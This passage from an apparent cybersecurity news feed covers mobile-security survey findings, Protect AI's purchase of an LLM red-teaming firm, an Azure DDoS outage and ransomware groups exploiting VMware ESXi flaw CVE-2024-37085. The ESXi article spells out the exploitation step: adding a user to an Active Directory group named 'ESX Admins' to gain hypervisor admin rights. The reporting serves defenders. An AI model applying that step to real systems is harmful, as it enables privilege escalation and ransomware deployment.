“These findings highlight the continued friction that employers face as more and more work is done on personal mobile devices,” said Phil Hochmuth Research VP, enterprise mobility at IDC. “This is why we are seeing more and more employers move from a pure bring-your-own-device model to employer provided devices where CIO’s can have greater governance to protect critical infrastructure from cyber attacks."

Additionally, Hochmuth says, organizations should adopt robust frameworks such as Zero Trust and the National Institute of Standards and Technology’s Cybersecurity Framework (NIST CSF) 2.0, and comply with mandates like the European Union’s NIS2 Directive.

**Emerging AI cyberthreats meet new AI defenses**

Emerging artificial intelligence (AI) technologies are expected to exacerbate the mobile threat landscape, but it also presents opportunities for defense. A striking 77% of respondents anticipate that AI-assisted attacks, such as deepfakes and SMS phishing, are likely to succeed. At the same time, 88% of critical infrastructure respondents acknowledge the growing importance of AI-assisted cybersecurity solutions.

**Accounting for IoT growth in cybersecurity planning**

With companies increasingly deploying IoT devices, their digital landscapes are evolving, creating a need for cybersecurity strategies to evolve in kind.

“The Industrial Internet of Things (IIoT) is giving rise to a massive expansion in mobile device technology that goes well beyond phones, tablets and laptops. Enterprise networks now include all sorts of sensors and purpose-built devices that monitor, measure, manage and control commercial tasks and data flow,” said TJ Fox, SVP of Industrial IoT and Automotive, Verizon Business. “That IIoT growth brings with it a proportionate need for more knowledge, awareness and IT solutioning to ensure the security of those increasingly sophisticated networks. The growing importance that IoT plays in our customer’s technology ecosystem underscores why it should be a component in any sound cybersecurity program.”

**What business leaders should know**

The 2024 MSI helps inform cybersecurity decisions for leaders of businesses of all sizes and in key sectors. As mobile and IoT threats rise, the need for robust security measures has never been greater. In response to these growing threats, 84% of respondents have increased their mobile device security spending over the past year, with 89% of critical infrastructure respondents planning further increases.

This year’s MSI includes contributions from Verizon’s partners including Ivanti, Lookout, Jamf among others.  Help your organization lower cyber risks by deploying comprehensive security protections, continuous employee education and advanced threat detection capabilities. Read the Verizon Business 2024 Mobile Security Index to learn more about suggested best practices your organization can implement.

Verizon Business 2024 Mobile Security Index Reveals Escalating Risks in Mobile and IoT Security

PRESS RELEASE

SEATTLE -- July 31, 2024 – Protect AI, a leader in AI security, today announced the acquisition of SydeLabs, which specializes in the automated attack simulation (red teaming) of generative AI (GenAI) systems. This strategic acquisition enhances Protect AI's platform ability to test and improve LLM security and extends the company’s lead as the only provider of end-to-end AI security solutions.

SydeLabs: A Leader in AI Red Teaming

Generative AI and LLM adoption are revolutionizing industries. LLMs are being integrated into critical end user applications such as customer service, finance and healthcare. However the complexity and scale of the technology has exacerbated security concerns that traditional application security processes simply can not keep up with or address effectively. 

SydeLabs was founded less than a year ago by former product and engineering leads from Google and MPL, and has quickly established itself as a pioneer in the field of AI security. Based in Bangalore, India, SydeLabs has developed SydeBox, a cutting-edge product designed to provide comprehensive vulnerability assessments for GenAI systems. The talented team from SydeLabs will join Protect AI where they will continue to add local talent in Bangalore to complement our Seattle and Berlin based teams.

“Protect AI is continuously looking to add products to our AI security posture management platform that help our customers build a safer AI-powered world,” said Ian Swanson, CEO of Protect AI. “The acquisition of SydeLabs extends the Protect AI platform with unmatched red teaming capabilities and immediately provides our customers with the ability to stress test, benchmark and harden their large language models against security risks.” 

SydeBox will be integrated into the Protect AI Platform and rebranded as Protect AI Recon. Recon identifies potential vulnerabilities in LLMs, ensuring enterprises can deploy AI applications with confidence. Key features of Recon include no-code integration, model-agnostic scanning, and detailed threat profiling across multiple categories. Recon uses both an attack library and LLM agent based solution for red teaming and evaluating the security and safety of GenAI systems. Protect AI Recon aligns perfectly with the growing demand for robust AI security solutions, driven by formal guidance from NIST, MITRE, OWASP and CISA, as well as mandates like the Executive Order on AI Safety and Security and the EU AI Act.

“The combination of SydeLabs’ SydeBox and Protect AI’s platform provides customers a comprehensive defense-in-depth solution for building, managing, testing, deploying and monitoring LLMs,” said Ruchir Patwa, co-founder of SydeLabs. “We couldn’t be more excited about joining the Protect AI mission and the prospect of what we can achieve in terms of helping companies of all sizes adopt and deploy more secure LLMs and AI applications.”

The new Recon product will enable Protect AI to meet growing customer demand for robust AI security solutions. Customers will benefit from detailed threat profiling across jailbreaks, prompt injection attacks, input manipulations and other attack vectors, which are crucial for maintaining the integrity and security of AI systems. Recon covers six of the OWASP Top 10 for LLM applications.

“Recon, formally SydeBox, has enabled us to identify and fix security blindspots before deploying our GenAI solutions to ensure we are building the most secure and safe LLM powered applications, and that products we serve our customers are free from any security or safety loopholes,” Said Kiran Darisi, CTO and cofounder, AtomicWork.

This acquisition and new product, Recon, further enhances Protect AI’s position as the leader in the AI security market and AI Security Posture Management (AI-SPM) solutions, differentiating it from competitors and solidifying its market presence. More specifically when used alongside Layer, Protect AI’s LLM observability and monitoring solution, Recon enables organizations to harden the implementation of LLMs against the spectrum of emerging security concerns associated with GenAI usage. Partners and stakeholders will also gain from the enhanced security capabilities, ensuring that the entire AI ecosystem is better protected against potential threats.

About SydeLabs

SydeLabs is a pioneering AI security company specializing in automated red teaming for GenAI systems. Founded by former leaders from Google and MPL, SydeLabs has developed SydeBox, a leading product designed to identify and mitigate vulnerabilities in LLMs. SydeLabs’ products have been adopted by enterprises to make GenAI models and applications safe and secure, giving them the confidence to deploy these systems to production. The company is headquartered in Bangalore. 

About Protect AI

Protect AI empowers organizations to secure their AI applications with comprehensive AI Security Posture Management (AI-SPM) capabilities, enabling them to see, know, and manage their ML environments effectively. The Protect AI Platform offers end-to-end visibility, remediation, control, and governance, safeguarding AI/ML systems from security threats and risks. Founded by AI leaders from Amazon and Oracle, Protect AI is backed by top investors, including Acrew Capital, boldstart ventures, Evolution Equity Partners, Knollwood Capital, Pelion Ventures, 01 Advisors, StepStone Group, Samsung, and Salesforce Ventures. The company is headquartered in Seattle, with offices in Berlin and Bangalore. For more information, visit our website and follow us on LinkedIn and Twitter.

Protect AI Acquires SydeLabs to Red Team Large Language Models

The sustained cyberattack, likely made worse by a mitigation snafu, disrupted several Azure cloud services for nearly eight hours on July 30.

Source: DD Images via Shutterstock

Microsoft blamed an implementation error for amplifying the impact of a distributed denial-of-service (DDoS) attack yesterday, which ended up disrupting the company's Azure cloud services for nearly eight hours.

The attack affected several Azure offerings, including Azure App Services, Azure IoT Central, Application Insights, Log Search Alerts, and Azure Policy. The disruption, which began at around 7:45 a.m. ET and lasted until 3:43 p.m. ET, also impacted the main Azure portal and a subset of Microsoft 365 and Microsoft Purview data-protection services.

**DDoS Cyber-Defense Error Under Investigation**

In an event summary yesterday, Microsoft described the DDoS attack as causing an "unexpected usage spike \[that\] resulted in Azure Front Door (AFD) and Azure Content Delivery Network (CDN) components performing below acceptable thresholds." The spike caused intermittent service errors, timeouts, and sudden latency increases.

More concerningly in some ways, "while the initial trigger event was a DDoS attack, which activated our DDoS protection mechanisms, initial investigations suggest that an error in the implementation of our defenses amplified the impact of the attack rather than mitigating it."

Microsoft has not specifically identified the mistake that exacerbated the DDoS attack. But according to its description of the events of July 30, the initial network configuration changes the company made to support DDoS mitigation efforts may have led to some unexpected "side effects." The company implemented an updated approach that it first rolled out in thbe Asia-Pacific region and Europe, and then deployed in the Americas after validating the approach worked.

"Our team will be completing an internal retrospective to understand the incident in more detail," Microsoft said. "We will publish a Preliminary Post Incident Review (PIR) within approximately 72 hours, to share more details on what happened and how we responded."

**Inadvertent Errors in DDoS Mitigation**

Rody Quinlan, staff research engineer at Tenable, says there are several ways an organization can mess up a DDoS mitigation effort.

"Organizations can inadvertently amplify cyberattacks through various implementation errors, such as misconfigured rate limiting, inefficient load balancing, firewall misconfigurations, overly aggressive security rules, inadequate resource scaling, incorrect traffic filtering, and dependence on single points of failure," he says. "These errors can lead to blocked legitimate traffic, overloaded servers, bottlenecked firewalls, and critical services being taken offline."

And while Microsoft's initial response might have contributed to its Azure service problems this week, the incident is another reminder of how effective DDoS attacks remain for adversaries looking to disrupt and degrade a target's online presence.

A Cloudflare report earlier this year identified a 117% increase year-over-year in network-layer DDoS attacks. Part of the reason for that is a specific increase in DDoS attacks that targeted retail, shipping, and public relations websites on and around Black Friday and the holiday shopping season in general. However, many of the attacks have also been by groups looking to send out a specific message or convey a particular political stance. Cloudflare, for example, said it has observed a massive increase in DDoS attacks that target Taiwanese, Israeli, and Palestinian sites amid geopolitical tensions in those areas, and attacks on environmental sciences websites.

**DDoS Attacks Adopt "Smash & Grab" Tactics**

"Trends in DDoS are often cyclical, but currently we’re seeing attacks grow larger in size, and shorter in duration," says Donny Chong, director at DDoS security vendor Nexusguard. "Our most recent data suggests that attack sizes increased by an average of 183% last year, with an average size of 0.80Gbps," he says. At the same time, between 2022 and 2023, the average duration of DDoS attacks dropped to just over 101 minutes. Currently, 81% of DDoS attacks last less than 90 minutes, Chong says.

"Part of this decrease in attack duration is due to attackers becoming more and more efficient when inflicting disruption on business," likely because they are using artificial intelligence (AI) to automate some attacks. But the shorter attack durations are also likely due to mitigation technologies, Chong says. "\[Attackers\] are finding it increasingly difficult to sustain prolonged disruptions. So, rather than a prolonged siege, it's now more a case of ‘smash and grab,'" he says.

Quinlan says the key to mitigating DDoS disruption is having a real-time traffic analysis capability, scalable cloud infrastructure, redundant systems, and intelligent load balancing to prevent overload. "Proper rate limiting, throttling, and WAFs \[Web application firewalls\] filtering malicious traffic, and regular software and hardware vulnerability remediation is crucial to protect systems," Quinlan says. "An effective incident-response plan and collaboration with Internet service providers and security providers enhance detection and mitigation capabilities."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Microsoft: Azure DDoS Attack Amplified by Cyber-Defense Error

With sufficient privileges in Active Directory, attackers only have to create an "ESX Admins" group in the targeted domain and add a user to it.

Source: Schoening via Alamy Stock Photo

Multiple ransomware groups have been weaponizing an authentication bypass bug in VMware ESXi hypervisors to quickly deploy malware across virtualized environments.

VMware assigned the bug (CVE-2024-37085) a "medium" 6.8 out of 10 score on the CVSS scale. The average score is largely due to the fact that it requires an attacker to have existing permissions in a target's Active Directory (AD).

If they do have AD access, however, attackers can cause significant damage. With no technical trickery whatsoever, they can use CVE-2024-37085 to instantly scale up their ESXi privileges to the max, opening the door to ransomware deployment, data exfiltration, lateral movement, and more. Groups like Storm-0506 (aka Black Basta), Storm-1175, Manatee Tempest (part of Evil Corp), and Octo Tempest (aka Scattered Spider) have already tried it out, deploying ransomware such as Black Basta and Akira.

Broadcom recently published a fix, available on its website.

**How CVE-2024-37085 Works**

Some organizations configure their ESXi hypervisors to use AD for user management. It turns out that by doing this, organizations were exposing themselves to something unexpected. By default, ESXi hypervisors granted full administrative access to any member of an AD domain group named "ESX Admins."

It's unclear how the "ESX Admins" group vulnerability was introduced into ESXi in the first place—Broadcom declined to clarify when Dark Reading reached out on the question. As Microsoft noted in a blog post, there's no particular reason why the hypervisor should have expected such a domain group, or have had a rule for what to do with it. "This group is not a built-in group in Active Directory and does not exist by default. ESXi hypervisors do not validate that such a group exists when the server is joined to a domain and still treats any members of a group with this name with full administrative access, even if the group did not originally exist," the threat intel team wrote. "Additionally, the membership in the group is determined by name and not by security identifier (SID)."

Exploiting CVE-2024-37085 was entirely trivial. So long as an attacker had sufficient privileges in AD, all they'd have to do to gain ESXi admin privileges was to create an "ESX Admins" group in the targeted domain and add a user to it. They could also rename any existing group to "ESX Admins," and either wield one of its existing users or add a new one.

**The Risk with Hypervisors**

"Ransomware attacks targeting ESXi and VMs are increasingly common, especially since around 2020, when enterprises increased their move toward digital transformation and took advantage of modern hybrid cloud and virtualized on-premise environments," explains Jason Soroko, senior vice president of product at Sectigo.

For all the business sense they make, virtualized environments also afford hackers unique benefits. Hypervisors tend to run many VMs at once, making them a one-stop shop for blasting ransomware as widely as possible, and those VMs often host critical services and business data.

Their utility to hackers makes it all the more troubling that, as Microsoft noted in its blog, security products have limited visibility and protections for hypervisors. This, Soroko explains, is "due to their isolation, complexity, and the specialized knowledge required for their protection. This isolation makes it difficult for traditional security tools to monitor and protect the entire environment, and API integration limits further exacerbate this issue."

To cover for these shortcomings, Microsoft highlighted the importance of keeping up to date with patches, and practicing broader cyber hygiene around critical and vulnerable assets. "Attackers love using the path of least resistance that provides maximum opportunity," Soroko notes, adding that ransomware actors will only target these systems more and more in the future.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Tag

#acer